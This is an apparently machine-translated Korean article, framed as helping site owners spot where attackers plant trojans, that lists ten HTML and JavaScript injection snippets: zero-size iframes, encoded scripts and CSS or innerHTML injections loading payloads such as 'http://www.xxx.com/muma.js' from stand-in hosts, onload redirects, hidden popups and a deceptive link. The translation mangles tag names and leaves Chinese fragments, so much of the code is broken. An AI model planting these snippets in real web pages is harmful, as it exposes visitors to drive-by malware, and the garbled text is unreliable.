이 기사에서는 악의적인 사람들이 웹 페이지에 트로이 목마를 걸어두기 위해 자주 사용하는 방법을 알려줌으로써 자신의 웹페이지를 예방할 수 있도록 트로이 목마를 걸어두는 데 자주 사용되는 이러한 장소를 탐지하는 한 위치를 쉽게 찾을 수 있습니다. 트로이 목마의.
1: 프레임 매달린 말
<iframe src=주소 너비=0 높이=0></iframe>
해당 주소 등에 악성사이트 링크를 입력할 수 있습니다.
2: js 파일 마운트
JS 파일이라면 악의적으로 수정되어 악성코드로 연결될 수 있으며, 일반적으로 사이트 전체에서 참조되는 JS 코드는 트로이목마로 연결될 가능성이 가장 높습니다. JS 코드의 왼쪽이나 아래쪽은 악성 코드와 일반 코드를 결합하는 것을 좋아하므로 공백이나 캐리지 리턴이 많이 숨겨져 있으므로 JS 코드 페이지를 의도적으로 늘렸는지 확인해야 합니다.
3: js 변형 암호화
<SCRIPT 언어=JScript.Encode src=http://www.xxx.com/muma.txt></script>
muma.txt는 어떤 접미사로든 변경할 수 있습니다.
4: 몸에 매달린 말
<body onload=window.location='address';></body>
5: 숨은 말 매달기
top.document.body.innerHTML = top.document.body.innerHTML + '/r/n<iframe src=http://www.xxx.com/muma.htm/></iframe>';
여섯 번째: CSS에 매달린 말
몸 {
배경 이미지: url('javascript:document.write(<script src=http://www.XXX.net/muma.js></script>)')}
이 방법은 더 무자비하고 탐지하기가 더 어렵습니다.
세븐:JAJA 매달린 말
<SCRIPT 언어=자바스크립트>
window.open (주소,,도구 모음=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1);
</script>
여덟 번째: 그림 변장
<html>
<iframe src=网马地址 높이=0 너비=0></iframe>
<img src=이미지 주소></center>
</html>
9: 변장 호출
<프레임세트 행=444,0열=*>
<frame src=웹페이지 열기 framborder=스크롤 없음=자동 크기 조정 marginwidth=0margingheight=0>
<frame src=网马地址frameborder=스크롤 없음=크기 조정 없음 marginwidth=0margingheight=0>
</프레임세트>
10: 고급 속임수
<a href=http://www.163.com(연결 주소를 혼동하고 이 주소가 트로이 목마 주소를 가리키는 것으로 표시) onMouseOver=www_163_com() return true;> 페이지에 표시할 콘텐츠</a>
<SCRIPT 언어=자바스크립트>
함수 www_163_com ()
{
var url=넷 말 주소;
open(url,NewWindow,toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizing=no,copyhistory=yes,width=800,height=600,left=10, 상단=10);
}
</SCRIPT>